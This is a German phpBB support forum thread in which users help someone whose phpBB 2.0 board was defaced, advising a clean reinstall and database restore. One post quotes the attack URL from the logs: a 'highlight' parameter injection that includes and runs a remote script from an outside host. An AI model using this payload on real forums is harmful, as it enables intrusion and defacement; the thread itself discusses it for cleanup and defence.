Probleme bei der regulären Arbeiten mit phpBB, Fragen zu Vorgehensweisen oder Funktionsweise sowie sonstige Fragen zu phpBB im Allgemeinen.
Forumsregeln phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
wenn tatsächlich bei einem Aufruf die index.php wieder durch eine neue ersetzt wird, dann gehe ich davon aus, dass in einer anderen Datei dies programmiert wurd.
Ich würde hingehe und mal in sämtlichen Verzeichnissen in den Dateien z.B. das Wort "FUCK" suche
Wenn so ein Script auf dem Server ausgeführt wird, kann man sich ja auch kaum beschweren.
Fragt sich nur, wer das Script vorher hochgeladen hat. Ich glaube kaum, daß es durch ein unbekanntest Sicherheitsloch im phpBB 2.0.18 entstanden ist. Sowas würden die Leute viel geschickter ausnutzen.
Lösche alle Files auf dem FTP Server und installiere das phpBB2.0.18 neu. Danach spiele ein altes Backup der Datenbank wieder ein. - Fertig.
Das Skript geht auch nur mit älteren Versionen, oder? Der komplette Pfad lautete nämlich so:
t=71&highlight=%2527.$poster=include($_GET[m]).%2527&m=http://www.yatas.com/phpbb_private.txt?&
Und das mit dem "highlight" wurde doch schon längst gefixt, oder?
Ganz klar, hier wurde schlampig oder garnicht gepatched. (Vielleicht der gravierende Fehler, nur die Datenbank immer geupdatet zu haben?!?)
Am besten wäre es die Datenbank zu retten und ein neues PhpBB 2.0.18 KOMPLETT aufzuspielen. Deine Files sind nicht vertrauenswürdig, da sie offenbar manipuliert sind, garnicht geupdatet und auf einem alten Stand sind, den du offensichtlich nicht kennst etc.
Ist das Beste so, im übrigen war hier eindeutig der Highlight-Exploit am werkeln. (siehe Dennis)
Ich habe selbst mehrere Angriffe dieser Art in meinem Forum gehabt und dieser spezielle Fall sollte NUR die Index.php im Normalfall angegriffen haben, aber bei der alten Forumversion ist natürlich nicht ausschließbar, dass sich noch weitere Würmer bedient haben.
Wie gesagt, komplett neu die Files des Forums uploaden und Mods wieder nachträglich einbauen ist eindeutig der schnellste und vorallem sicherste Weg.
Bei einem phpBB 2.0.11 ist es kein Wunder. Das Forum halt halt ein Sicherheitsloch.
Aber wenn es auf einem anderen Account war, dann würde ich mir ganz schnell einen neuen Hoster suchen. Wenn ein anderer Kunde auf Deine Daten zugriefen kann, dann kann er ja ganz einfach in das Admin-Menü Deines Forums kommen oder deine User mit Spam vollmüllen.